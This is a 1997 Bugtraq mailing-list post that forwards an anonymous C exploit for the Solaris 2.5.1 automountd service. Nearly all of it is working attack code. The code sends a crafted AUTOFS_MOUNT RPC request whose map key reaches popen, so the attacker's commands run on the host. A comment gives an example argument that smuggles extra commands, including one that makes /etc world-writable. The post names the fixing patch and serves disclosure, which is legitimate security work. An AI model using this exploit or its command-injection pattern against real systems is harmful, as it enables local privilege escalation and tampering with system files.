'Solaris 2.5.1 automountd exploit (fwd)'

[prev in list] [next in list] [prev in thread] [next in thread] 

List:       bugtraq
Subject:    Solaris 2.5.1 automountd exploit (fwd)
From:       Aleph One <aleph1 () DFW ! NET>
Date:       1997-11-26 2:02:13
[Download RAW message or body]

From anonymous:
--

/*
 this is really dumb automountd exploit, tested on solaris 2.5.1
 ./r blahblah /bin/chmod "777 /etc; 2nd cmd;3rd cmd" and so on,
 map is executed via popen with key given as argument, read automount(1M)

 patch 10465[45] fixes this

 */

#include <sys/types.h>
#include <sys/time.h>
#include <stdio.h>
#include <netdb.h>
#include <rpc/rpc.h>
#include <rpcsvc/autofs_prot.h>

#define AUTOTS "datagram_v" /* XXX */

void usage(char *s) {
  printf("Usage: %s mountpoint map key [opts]\n", s);
  exit(0);
}

bool_t
xdr_mntrequest(xdrs, objp)
        register XDR *xdrs;
        mntrequest *objp;
{

        register long *buf;

        if (!xdr_string(xdrs, &objp->name, A_MAXNAME))
                return (FALSE);
        if (!xdr_string(xdrs, &objp->map, A_MAXNAME))
                return (FALSE);
        if (!xdr_string(xdrs, &objp->opts, A_MAXOPTS))
                return (FALSE);
        if (!xdr_string(xdrs, &objp->path, A_MAXPATH))
                return (FALSE);
        return (TRUE);
}

bool_t
xdr_mntres(xdrs, objp)
        register XDR *xdrs;
        mntres *objp;
{

        register long *buf;

        if (!xdr_int(xdrs, &objp->status))
                return (FALSE);
        return (TRUE);
}

main(int argc, char *argv[]) {
  char hostname[MAXHOSTNAMELEN];
  CLIENT *cl;
  enum clnt_stat stat;
  struct timeval tm;
  struct mntrequest req;
  struct mntres result;

  if (argc < 4)
    usage(argv[0]);

  req.path=argv[1];
  req.map=argv[2];
  req.name=argv[3];
  req.opts=argv[4];
  if (gethostname(hostname, sizeof(hostname)) == -1) {
    perror("gethostname");
    exit(0);
  }
  if ((cl=clnt_create(hostname, AUTOFS_PROG, AUTOFS_VERS, AUTOTS)) == NULL) {
    clnt_pcreateerror("clnt_create");
    exit(0);
  }
  tm.tv_sec=5;
  tm.tv_usec=0;
  stat=clnt_call(cl, AUTOFS_MOUNT, xdr_mntrequest, (char *)&req, xdr_mntres,
                (char *)&result, tm);
  if (stat != RPC_SUCCESS)
    clnt_perror(cl, "mount call");
  else
    printf("mntres = %d.\n", result.status);
  clnt_destroy(cl);
}

[prev in list] [next in list] [prev in thread] [next in thread]
Configure | About | News | Add a list | Sponsored by KoreLogic